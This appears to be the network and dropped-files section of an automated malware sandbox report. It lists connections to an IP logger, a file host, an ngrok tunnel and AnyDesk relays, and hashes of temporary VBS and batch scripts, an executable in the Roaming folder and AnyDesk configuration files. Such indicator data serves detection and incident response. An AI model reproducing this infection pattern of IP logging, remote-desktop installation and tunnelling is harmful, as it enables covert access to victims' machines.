GB 172.217.16.238:443 google.com tcp
GB 172.217.16.226:443 googleads.g.doubleclick.net tcp
US 8.8.8.8:53 www.google.com udp
GB 216.58.204.68:443 www.google.com tcp
NL 142.250.102.92:443 pay.google.com udp
US 8.8.8.8:53 pay.sandbox.google.com udp
NL 142.250.102.81:443 pay.sandbox.google.com tcp
US 8.8.8.8:53 92.102.250.142.in-addr.arpa udp
US 8.8.8.8:53 129.250.125.74.in-addr.arpa udp
US 8.8.8.8:53 34.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 238.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 226.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 68.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 227.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 81.102.250.142.in-addr.arpa udp
US 8.8.8.8:53 cdn.iplogger.org udp
US 8.8.8.8:53 play.google.com udp
US 172.67.74.161:443 cdn.iplogger.org tcp
GB 142.250.179.238:443 play.google.com tcp
GB 142.250.179.238:443 play.google.com tcp
GB 142.250.179.238:443 play.google.com tcp
GB 142.250.179.238:443 play.google.com tcp
GB 142.250.179.238:443 play.google.com tcp
GB 142.250.179.238:443 play.google.com tcp
US 8.8.8.8:53 gofile.io udp
FR 45.112.123.126:443 gofile.io tcp
FR 45.112.123.126:443 gofile.io tcp
GB 142.250.179.238:443 play.google.com udp
US 8.8.8.8:53 161.74.67.172.in-addr.arpa udp
US 8.8.8.8:53 238.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 126.123.112.45.in-addr.arpa udp
US 8.8.8.8:53 api.gofile.io udp
FR 45.112.123.126:443 api.gofile.io tcp
US 8.8.8.8:53 s.gofile.io udp
US 8.8.8.8:53 ad.a-ads.com udp
FR 51.75.242.210:443 s.gofile.io tcp
FR 51.75.242.210:443 s.gofile.io tcp
FR 51.75.242.210:443 s.gofile.io tcp
US 8.8.8.8:53 210.242.75.51.in-addr.arpa udp
DE 188.40.69.138:443 ad.a-ads.com tcp
DE 188.40.69.138:443 ad.a-ads.com tcp
US 8.8.8.8:53 static.a-ads.com udp
US 8.8.8.8:53 138.69.40.188.in-addr.arpa udp
DE 213.239.209.209:443 static.a-ads.com tcp
DE 213.239.209.209:443 static.a-ads.com tcp
US 8.8.8.8:53 store4.gofile.io udp
FR 31.14.70.245:443 store4.gofile.io tcp
FR 31.14.70.245:443 store4.gofile.io tcp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 209.209.239.213.in-addr.arpa udp
US 8.8.8.8:53 245.70.14.31.in-addr.arpa udp
US 8.8.8.8:53 195.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 98.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 boot.net.anydesk.com udp
DE 195.181.174.174:443 boot.net.anydesk.com tcp
US 8.8.8.8:53 174.174.181.195.in-addr.arpa udp
US 8.8.8.8:53 relay-79bdf984.net.anydesk.com udp
GB 195.181.165.153:443 relay-79bdf984.net.anydesk.com tcp
US 8.8.8.8:53 153.165.181.195.in-addr.arpa udp
US 134.209.68.5:443 ctt.ac tcp
US 134.209.68.5:443 ctt.ac tcp
US 8.8.8.8:53 clicktotweet.com udp
US 134.209.68.5:443 clicktotweet.com tcp
US 8.8.8.8:53 5.68.209.134.in-addr.arpa udp
US 8.8.8.8:53 twitter.com udp
US 104.244.42.193:443 twitter.com tcp
US 104.244.42.193:443 twitter.com tcp
US 8.8.8.8:53 x.com udp
US 8.8.8.8:53 region1.google-analytics.com udp
US 104.244.42.65:443 x.com tcp
US 216.239.32.36:443 region1.google-analytics.com tcp
US 8.8.8.8:53 78.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 200.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 193.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 65.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 36.32.239.216.in-addr.arpa udp
DE 195.181.174.174:443 boot.net.anydesk.com tcp
US 8.8.8.8:53 abs.twimg.com udp
US 8.8.8.8:53 api.twitter.com udp
US 8.8.8.8:53 api.x.com udp
US 104.244.42.66:443 api.twitter.com tcp
GB 146.75.72.159:443 abs.twimg.com tcp
US 104.244.42.2:443 api.x.com tcp
US 8.8.8.8:53 pbs.twimg.com udp
US 8.8.8.8:53 t.co udp
GB 151.101.188.159:443 pbs.twimg.com tcp
US 162.159.140.229:443 t.co tcp
US 8.8.8.8:53 relay-aeafd8c0.net.anydesk.com udp
GB 146.75.72.159:443 abs.twimg.com tcp
GB 57.128.141.154:443 relay-aeafd8c0.net.anydesk.com tcp
N/A 239.255.102.18:50001 udp
US 8.8.8.8:53 159.72.75.146.in-addr.arpa udp
US 8.8.8.8:53 66.42.244.104.in-addr.arpa udp
N/A 239.255.102.18:50002 udp
US 8.8.8.8:53 2.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 159.188.101.151.in-addr.arpa udp
US 8.8.8.8:53 229.140.159.162.in-addr.arpa udp
US 8.8.8.8:53 154.141.128.57.in-addr.arpa udp
N/A 239.255.102.18:50003 udp
US 8.8.8.8:53 video.twimg.com udp
US 8.8.8.8:53 abs-0.twimg.com udp
GB 151.101.188.158:443 video.twimg.com tcp
US 104.244.43.131:443 abs-0.twimg.com tcp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
US 8.8.8.8:53 18.102.255.239.in-addr.arpa udp
US 8.8.8.8:53 158.188.101.151.in-addr.arpa udp
US 8.8.8.8:53 131.43.244.104.in-addr.arpa udp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.27.84:443 accounts.google.com tcp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
US 104.244.42.2:443 api.x.com tcp
US 104.244.42.2:443 api.x.com tcp
US 104.244.42.2:443 api.x.com tcp
US 104.244.42.2:443 api.x.com tcp
US 104.244.42.2:443 api.x.com tcp
US 8.8.8.8:53 84.27.250.142.in-addr.arpa udp
NL 142.250.27.84:443 accounts.google.com udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
US 8.8.8.8:53 spankbang.com udp
US 104.19.130.98:443 spankbang.com tcp
US 104.19.130.98:443 spankbang.com tcp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
US 8.8.8.8:53 98.130.19.104.in-addr.arpa udp
US 8.8.8.8:53 hls-uranus.sb-cd.com udp
US 8.8.8.8:53 tbi.sb-cd.com udp
US 104.16.4.5:443 hls-uranus.sb-cd.com tcp
NL 185.76.10.17:443 tbi.sb-cd.com tcp
NL 185.76.10.17:443 tbi.sb-cd.com tcp
US 8.8.8.8:53 c.ptgncdn.com udp
US 8.8.8.8:53 deliver.ptgncdn.com udp
US 8.8.8.8:53 cdnjs.cloudflare.com udp
DE 195.181.175.41:443 c.ptgncdn.com tcp
DE 195.181.175.41:443 c.ptgncdn.com tcp
US 104.18.33.166:443 deliver.ptgncdn.com tcp
US 104.18.33.166:443 deliver.ptgncdn.com tcp
US 104.16.4.5:443 hls-uranus.sb-cd.com tcp
US 104.17.24.14:443 cdnjs.cloudflare.com tcp
US 8.8.8.8:53 assets.sb-cd.com udp
US 8.8.8.8:53 static.cloudflareinsights.com udp
US 8.8.8.8:53 desire2do0961.spankbang.com udp
US 104.16.79.73:443 static.cloudflareinsights.com tcp
US 104.16.5.5:443 assets.sb-cd.com tcp
US 104.16.5.5:443 assets.sb-cd.com tcp
US 104.16.5.5:443 assets.sb-cd.com tcp
US 104.16.5.5:443 assets.sb-cd.com tcp
US 104.16.5.5:443 assets.sb-cd.com tcp
US 104.16.5.5:443 assets.sb-cd.com tcp
US 104.16.5.5:443 assets.sb-cd.com tcp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
US 104.19.130.98:443 desire2do0961.spankbang.com tcp
US 8.8.8.8:53 5.4.16.104.in-addr.arpa udp
US 8.8.8.8:53 17.10.76.185.in-addr.arpa udp
US 8.8.8.8:53 41.175.181.195.in-addr.arpa udp
US 8.8.8.8:53 166.33.18.104.in-addr.arpa udp
US 8.8.8.8:53 14.24.17.104.in-addr.arpa udp
US 8.8.8.8:53 creative.xlviirdr.com udp
US 104.21.54.71:443 creative.xlviirdr.com tcp
US 216.239.32.36:443 region1.google-analytics.com udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
US 8.8.8.8:53 static.javhd.com udp
US 8.8.8.8:53 stats.postgen.com udp
US 8.8.8.8:53 73.79.16.104.in-addr.arpa udp
US 8.8.8.8:53 5.5.16.104.in-addr.arpa udp
US 8.8.8.8:53 71.54.21.104.in-addr.arpa udp
US 104.21.54.71:443 creative.xlviirdr.com tcp
DE 212.102.56.178:443 static.javhd.com tcp
US 8.8.8.8:53 a.magsrv.com udp
US 74.117.182.34:443 stats.postgen.com tcp
US 74.117.182.34:443 stats.postgen.com tcp
US 74.117.182.34:443 stats.postgen.com tcp
US 74.117.182.34:443 stats.postgen.com tcp
DE 169.150.255.184:443 a.magsrv.com tcp
DE 169.150.255.184:443 a.magsrv.com tcp
US 8.8.8.8:53 go.xlviirdr.com udp
DE 169.150.255.184:443 a.magsrv.com tcp
US 8.8.8.8:53 video.ktkjmp.com udp
US 104.18.40.50:443 go.xlviirdr.com tcp
US 104.18.48.21:443 video.ktkjmp.com tcp
US 104.18.40.50:443 go.xlviirdr.com tcp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
US 8.8.8.8:53 178.56.102.212.in-addr.arpa udp
US 8.8.8.8:53 34.182.117.74.in-addr.arpa udp
US 8.8.8.8:53 184.255.150.169.in-addr.arpa udp
US 8.8.8.8:53 50.40.18.104.in-addr.arpa udp
US 8.8.8.8:53 21.48.18.104.in-addr.arpa udp
US 8.8.8.8:53 s.magsrv.com udp
NL 95.211.229.246:443 s.magsrv.com tcp
NL 95.211.229.246:443 s.magsrv.com tcp
US 8.8.8.8:53 vstream-36.sb-cd.com udp
US 8.8.8.8:53 stripchats.io udp
US 8.8.8.8:53 img.strpst.com udp
US 104.17.118.12:443 stripchats.io tcp
DE 212.102.56.130:443 vstream-36.sb-cd.com tcp
US 104.17.10.106:443 img.strpst.com tcp
US 8.8.8.8:53 s3t3d2y8.afcdn.net udp
FR 185.93.2.12:443 s3t3d2y8.afcdn.net tcp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
US 8.8.8.8:53 246.229.211.95.in-addr.arpa udp
US 8.8.8.8:53 12.118.17.104.in-addr.arpa udp
US 8.8.8.8:53 130.56.102.212.in-addr.arpa udp
US 8.8.8.8:53 106.10.17.104.in-addr.arpa udp
US 8.8.8.8:53 edge-hls.doppiocdn.net udp
CZ 65.9.95.41:443 edge-hls.doppiocdn.net tcp
US 8.8.8.8:53 static.hotjar.com udp
CZ 65.9.95.86:443 static.hotjar.com tcp
US 8.8.8.8:53 crt.rootg2.amazontrust.com udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
CZ 65.9.95.72:80 crt.rootg2.amazontrust.com tcp
US 8.8.8.8:53 12.2.93.185.in-addr.arpa udp
US 8.8.8.8:53 41.95.9.65.in-addr.arpa udp
US 8.8.8.8:53 86.95.9.65.in-addr.arpa udp
US 8.8.8.8:53 script.hotjar.com udp
GB 54.230.10.124:443 script.hotjar.com tcp
US 8.8.8.8:53 94.95.9.65.in-addr.arpa udp
US 8.8.8.8:53 124.10.230.54.in-addr.arpa udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
US 8.8.8.8:53 b-hls-25.doppiocdn.net udp
GB 18.172.88.92:443 b-hls-25.doppiocdn.net tcp
GB 18.172.88.92:443 b-hls-25.doppiocdn.net tcp
US 8.8.8.8:53 72.95.9.65.in-addr.arpa udp
US 8.8.8.8:53 92.88.172.18.in-addr.arpa udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 api.playanext.com udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
CZ 65.9.95.118:80 api.playanext.com tcp
US 8.8.8.8:53 118.95.9.65.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 guiding-cheetah-vast.ngrok-free.app udp
DE 3.125.223.134:443 guiding-cheetah-vast.ngrok-free.app tcp
US 8.8.8.8:53 e5.o.lencr.org udp
GB 2.23.210.82:80 e5.o.lencr.org tcp
US 8.8.8.8:53 134.223.125.3.in-addr.arpa udp
US 8.8.8.8:53 32.169.19.2.in-addr.arpa udp
US 8.8.8.8:53 82.210.23.2.in-addr.arpa udp
DE 3.125.223.134:443 guiding-cheetah-vast.ngrok-free.app tcp
US 8.8.8.8:53 cdn.tsyndicate.com udp
NL 45.133.44.71:443 cdn.tsyndicate.com tcp
US 8.8.8.8:53 s.magsrv.com udp
NL 95.211.229.246:443 s.magsrv.com tcp
NL 95.211.229.246:443 s.magsrv.com tcp
US 8.8.8.8:53 tsyndicate.com udp
DE 136.243.46.131:443 tsyndicate.com tcp
US 8.8.8.8:53 acdn.tsyndicate.com udp
NL 45.133.44.71:443 acdn.tsyndicate.com tcp
US 8.8.8.8:53 ts.trafget.com udp
US 8.8.8.8:53 pxl.tsyndicate.com udp
US 172.67.128.119:443 ts.trafget.com tcp
DE 136.243.134.97:443 pxl.tsyndicate.com tcp
US 8.8.8.8:53 71.44.133.45.in-addr.arpa udp
US 8.8.8.8:53 131.46.243.136.in-addr.arpa udp
US 8.8.8.8:53 119.128.67.172.in-addr.arpa udp
US 8.8.8.8:53 97.134.243.136.in-addr.arpa udp
US 8.8.8.8:53 a.magsrv.com udp
NL 95.211.229.246:443 s.magsrv.com tcp
US 8.8.8.8:53 fa.openrtb-banner.com udp
US 172.67.189.45:443 fa.openrtb-banner.com tcp
US 8.8.8.8:53 45.189.67.172.in-addr.arpa udp
US 8.8.8.8:53 vstream-48.sb-cd.com udp
NL 185.76.10.18:443 vstream-48.sb-cd.com tcp
US 8.8.8.8:53 ad.a-ads.com udp
DE 136.243.11.250:443 ad.a-ads.com tcp
US 8.8.8.8:53 18.10.76.185.in-addr.arpa udp
US 8.8.8.8:53 250.11.243.136.in-addr.arpa udp
NL 95.211.229.246:443 s.magsrv.com tcp
US 8.8.8.8:53 a.orbsrv.com udp
DE 136.243.46.131:443 tsyndicate.com tcp
FR 185.93.2.11:443 a.orbsrv.com tcp
US 8.8.8.8:53 s.orbsrv.com udp
NL 95.211.229.248:443 s.orbsrv.com tcp
DE 136.243.134.97:443 pxl.tsyndicate.com tcp
US 8.8.8.8:53 248.229.211.95.in-addr.arpa udp
US 8.8.8.8:53 11.2.93.185.in-addr.arpa udp
US 8.8.8.8:53 a.magsrv.com udp
US 8.8.8.8:53 vstream-13.sb-cd.com udp
DE 212.102.56.136:443 vstream-13.sb-cd.com tcp
US 8.8.8.8:53 136.56.102.212.in-addr.arpa udp
NL 95.211.229.246:443 s.magsrv.com tcp
NL 95.211.229.248:443 s.orbsrv.com tcp
DE 136.243.46.131:443 tsyndicate.com tcp
DE 136.243.134.97:443 pxl.tsyndicate.com tcp
NL 95.211.229.246:443 s.magsrv.com tcp
US 8.8.8.8:53 a.magsrv.com udp
US 8.8.8.8:53 23.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 spankbang.com udp
US 8.8.8.8:53 deliver.ptgncdn.com udp
NL 95.211.229.248:443 s.orbsrv.com tcp
NL 95.211.229.248:443 s.orbsrv.com tcp
DE 136.243.46.131:443 tsyndicate.com tcp
US 8.8.8.8:53 vstream-47.sb-cd.com udp
NL 143.244.42.56:443 vstream-47.sb-cd.com tcp
DE 136.243.134.97:443 pxl.tsyndicate.com tcp
US 8.8.8.8:53 56.42.244.143.in-addr.arpa udp
NL 95.211.229.246:443 s.magsrv.com tcp
US 8.8.8.8:53 a.magsrv.com udp
US 8.8.8.8:53 ad.a-ads.com udp
DE 136.243.4.18:443 ad.a-ads.com tcp
US 8.8.8.8:53 static.a-ads.com udp
DE 148.251.1.246:443 static.a-ads.com tcp
US 8.8.8.8:53 18.4.243.136.in-addr.arpa udp
US 8.8.8.8:53 246.1.251.148.in-addr.arpa udp
NL 95.211.229.246:443 s.magsrv.com tcp
DE 136.243.46.131:443 tsyndicate.com tcp
DE 136.243.134.97:443 pxl.tsyndicate.com tcp
US 8.8.8.8:53 vstream-10.sb-cd.com udp
DE 138.199.37.55:443 vstream-10.sb-cd.com tcp
DE 138.199.37.55:443 vstream-10.sb-cd.com tcp
NL 95.211.229.246:443 s.magsrv.com tcp
DE 136.243.46.131:443 tsyndicate.com tcp
US 8.8.8.8:53 pxl.tsyndicate.com udp
DE 213.239.193.198:443 pxl.tsyndicate.com tcp
US 8.8.8.8:53 a.magsrv.com udp
NL 95.211.229.246:443 s.magsrv.com tcp
US 8.8.8.8:53 198.193.239.213.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 2783c40400a8912a79cfd383da731086
SHA1 001a131fe399c30973089e18358818090ca81789
SHA256 331fa67da5f67bbb42794c3aeab8f7819f35347460ffb352ccc914e0373a22c5
SHA512 b7c7d3aa966ad39a86aae02479649d74dcbf29d9cb3a7ff8b9b2354ea60704da55f5c0df803fd0a7191170a8e72fdd5eacfa1a739d7a74e390a7b74bdced1685

\??\pipe\LOCAL\crashpad_4088_XQTNHGFMFIYEJDIO

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 ff63763eedb406987ced076e36ec9acf
SHA1 16365aa97cd1a115412f8ae436d5d4e9be5f7b5d
SHA256 8f460e8b7a67f0c65b7248961a7c71146c9e7a19772b193972b486dbf05b8e4c
SHA512 ce90336169c8b2de249d4faea2519bf7c3df48ae9d77cdf471dd5dbd8e8542d47d9348080a098074aa63c255890850ee3b80ddb8eef8384919fdca3bb9371d9f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 d3c9ffdb77d85ef35664a14b0a8124cd
SHA1 9bb105a02bd8122e48c565d9af6d7b2d2ff0b833
SHA256 6332a8b72bd7edc13430c177b33f7610072b91f54f3d21ad98576fa341b6350a
SHA512 988cbd58aa73e0c3721f294824240a88f0b5f9bb422141364f3e24c391f009b945780cd65de0ffb67ef392985b6aad3706ce864e9f7308590effe3e8628cbeaf

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\02528e4a-6ba0-4fd2-aa75-15f06440783f.tmp

MD5 9641eb0e9182036c7c291e3c391eb67c
SHA1 179cd1b8a1830027a4966d947e1debf8b48969e3
SHA256 293c379ff74ba2467e1f9da41a99d4b19e1789bcb41865134c52011b9e83de3a
SHA512 b48a7d72905ec5d1c51d3e26fb35ad877ec132199d9b22d28d20c168f8dd6acb6bbbeaac19b1d843c5f6c77e2ff9415b1f68999bf06675244df13f4d721652ac

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 ea3a846370a6f3a6e2f720f4970f4418
SHA1 c4d55921433592a09b59b10f91bbc2df73173a67
SHA256 0c43a40aa7aa7ed44c56c6c3c16df31774795c78e7924e50f94cc75a0ca6cdeb
SHA512 c09a06b4db9890d57117f735e40af9d4cfc20f2c316dd9cb3c8f0675b969063f87aa9e15b91dcdea3ded1c1eb5bc58d4fa87ea83cfedab1b8aff276e85e8b929

C:\Users\Admin\Downloads\Unconfirmed 199374.crdownload

MD5 4a729d5343445570968920227f31ab2d
SHA1 7609d3ad9a2587ca7ac4593fc77b5b5f6747d0ce
SHA256 50137fb27b1ce05da9659710d1e67fbf93e7770760672f5d20ca98e3e5ea9fb0
SHA512 de821294f546cb901705d539d65b9e752272eeef308f4504283fb98dfa0b3e3ef29c8ae24d2b0f9e2b42c1ed4f8958e52935f049afb369b6b7d3ddf1db626e12

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 e9baeda113fab86d1af16f069daa62ea
SHA1 7daaaf15a51777fd46b1b6e8506ff8f951319f72
SHA256 349baad387313b42fd82dc61d81ab6aeac0f98e4fe12c54b94e201c61f3a4051
SHA512 e14779bd3f31cce16399ed719757abf59d857f40a01c73f008d105251cf975b95abeb81f96888c8ecce165219621bb35fa7890705b534a0baddd272d0d06e6b8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 7883dd4308bce78532584caa8a946148
SHA1 09c2504a3c62fcb26fe1ecf9039a2e420af64336
SHA256 984b51b0260726cc073aff038c4a72c8b93d9425703e4463ec716071c85eff63
SHA512 706b453dd2d76e23898b849abcb431aacbbd7a2259a5cab670d3678fd2e9b51bff25ab1457730cf1f79fc770c93ce03385e3b2e7bb341b61057df040d40123d9

C:\Users\Admin\AppData\Local\Temp\4987.tmp\4988.tmp\4989.vbs

MD5 c7fea9aeba94dbd8122817cb842895ac
SHA1 e8ca3995d62bdb1a07719d41dd536fd8d1fca96d
SHA256 24baec2f0006385c6d984371baed7b5b30de49df5f42034427e5779b72b0612c
SHA512 afb071341c11762a04fdce3fd436501cb6fe11918621e3f7f4edc69dc7f0f4e3ca5c8a399a88d0c6495c1ec850cc3c7dfb443be820f1eeb1b936ff598a3175fc

C:\Users\Admin\AppData\Roaming\doorbell-upd6.exe

MD5 680fee87b9f54a8476206a31ef441069
SHA1 5e96debd6d8d1541c6e5663a72ec3b4f6d473b78
SHA256 953d6e7f29f4ac599d03692665f12e5c7c9008c946eb6586bf10234137a09c3e
SHA512 5e35e0991f7e8de52e65c8051c4c1fdd966f75aec7c8a72f64dc4a38c29870c1f38943e3a0b4c8b3627cf022fe5e467d1a0163d8da90cece78ee90c9ad4f8ca0

C:\Users\Admin\AppData\Local\Temp\4C08.tmp\4C09.tmp\4C0A.bat

MD5 18bf04c0c8b778ffa52089758e1dbdbd
SHA1 eb8cca399766f4c1d35c336491bacf06f86d9857
SHA256 ead3b495bb915c2975f44c9a190b7517029f32928db47618018eac9fb8b4d572
SHA512 4f3ac08122e3e448c0d25f7888e78cbb95bda9878e5bbdddbd61b73768d060f9ba6c765b0a5ac232f41c5b5566ecc671b4a5b1dbfd29b09689a019fb939f131a

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5gwsisp4.moo.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5164-210-0x00000195C6050000-0x00000195C6072000-memory.dmp

C:\Users\Admin\Downloads\AnyDesk.exe

MD5 aee6801792d67607f228be8cec8291f9
SHA1 bf6ba727ff14ca2fddf619f292d56db9d9088066
SHA256 1cdafbe519f60aaadb4a92e266fff709129f86f0c9ee595c45499c66092e0499
SHA512 09d9fc8702ab6fa4fc9323c37bc970b8a7dd180293b0dbf337de726476b0b9515a4f383fa294ba084eccf0698d1e3cb5a39d0ff9ea3ba40c8a56acafce3add4f

memory/5292-215-0x00000000002B0000-0x00000000019F9000-memory.dmp

memory/5344-222-0x00000000002B0000-0x00000000019F9000-memory.dmp

memory/5360-224-0x00000000002B0000-0x00000000019F9000-memory.dmp

C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace

MD5 da37c2950c4aaeee2cd04811a2ce492a
SHA1 16bd50413f5494e8fcb9386ad8583c65e1c76880
SHA256 bc8e69f66f3cd44354874069e2339f9a871c15a08b8b0ba3fa19aa299dde508d
SHA512 8da88b2d3b8a8b0fb7b902e4bf26bcf27c09633fd0f722861facda2a32f170c0122ac088dc3b430e58fbcfc98880ea204647ee10f85d5fa8a0aa196409572083

C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

MD5 a787c308bd30d6d844e711d7579be552
SHA1 473520be4ea56333d11a7a3ff339ddcadfe77791
SHA256 8a395011a6a877d3bdd53cc8688ef146160dab9d42140eb4a70716ad4293a440
SHA512 da4fcf3a3653ed02ee776cfa786f0e75b264131240a6a3e538c412e98c9af52c8f1e1179d68ed0dd44b13b261dc941319d182a16a4e4b03c087585b9a8286973

C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf

MD5 0c04ad1083dc5c7c45e3ee2cd344ae38
SHA1 f1cf190f8ca93000e56d49732e9e827e2554c46f
SHA256 6452273c017db7cbe0ffc5b109bbf3f8d3282fb91bfa3c5eabc4fb8f1fc98cb0
SHA512 6c414b39bbc1f1f08446c6c6da6f6e1ceb9303bbf183ae279c872d91641ea8d67ec5e5c4e0824da3837eca73ec29fe70e92b72c09458c8ce50fa6f08791d1492

C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf

MD5 9b8189fb0b4f6c8e9575e9d7003c17a2
SHA1 7e9352c722cddef476290ca263f30f3d53cdee0e
SHA256 d4b5169c0ca7d35db5a00ecf67d49a9ca3422ceee5da3d43452a44d3dab37bb4
SHA512 1e4b0b49baa91c565d37cb6860bad6a56946a3c3f1906e895c1874994f77bd18cea52099b9c4da2c984e3e7e345b11dde1c6954767d6f8a924fd72187458efe6

C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf

MD5 c638e63c3e7d5c9ebdf79cae69d3beae
SHA1 41b6ad6f5757db2ebf9f7c58c27faf0d090b957e
SHA256 5ed75057c239c13641d3ff6f2c59f6ea9d5fc482fccc754c92086a4d6f32f7e0
SHA512 0dad696931d46c814473946440a4116f263b89d34ad4b4067d9f060c5e93bab4b1e9d6eae3bed6656b8b88bbb01e14422ee2089d785273379ab1e7206ef723dc

C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

MD5 f8e16ee3884ec02921dd487c40db355f
SHA1 a09dfd14e723cb8fa28c43bcd07f9984a563a341
SHA256 c183ea4620901e376c6b96515d9c0da33b48a65051f7ca91cb362b5c8f082d46
SHA512 9f508e9a83a7526d7cca7af8f48d39fffd8ef331aa681cabbda0545be609d602dfc87e3751be2137876f178942d815b5b71d001352908713ed986ef339dcaa4a

C:\Users\Admin\AppData\Roaming\AnyDesk\service.conf

MD5 7821cbcdc8ff0ccf03115ad779a5b542
SHA1 20c0054ee8566563bccb91eb741ee55017bb2c6e
SHA256 b0d7226c5b989496645798a974bc811743396a1a77450fd95011f81020c09363
SHA512 5f130e8c15c6756808237d60a225fc03428f29c4c7daae18427d87cd4e20a1c15dd3608412ba5ebc6e4547d811064c652bcf3aba65ff17546a87e0d0a2b2dc24

C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf

MD5 b877bd2d5b406b0d610a67dbf966ab9a
SHA1 ea719d8b36cd43f1f3ab044d2866adf17975b262
SHA256 d35a60121dbd908b957767365c10845ec80c36cc9dfff5569a130a4fedd5e207
SHA512 b7ecf9f27d5b2ef99fe163fbfb5efb5ffa338ad80f7f856fb31f5453164366f6c0791c86475658e841b423a4803bd6ff9a0494631a7dfd2f5c49d89c03b65d9e

C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf

MD5 d5dc96e1dfcb944d60cd4846e7ddefed
SHA1 8e426f915c808f0e5ad6cec6c515073823bea936
SHA256 12b0885146c81d81624858b2494ff93e9504272ba22685e13f33d2254f1f2e88
SHA512 085e833dc2703e89215d92f9edaa6e0b944e22cea1e2c54c450f9f405a0ba8e833f31e787918d61725dc60ba5bf4cabb127dc4c3e6b1d0da19a201a6ef37f163

memory/5344-322-0x00000000002B0000-0x00000000019F9000-memory.dmp

memory/5360-323-0x00000000002B0000-0x00000000019F9000-memory.dmp

memory/6076-349-0x0000000000170000-0x00000000018B9000-memory.dmp

C:\ProgramData\AnyDesk\system.conf

MD5 afdc4f69f4720b8c4153f6186f49a2b6
SHA1 329c27ea36d7913809b0c239bb58e91d2ee468ac
SHA256 9a218849d74b0ca75ef719b0cab59b40529b958097eb0b0b8527b09bc293a571
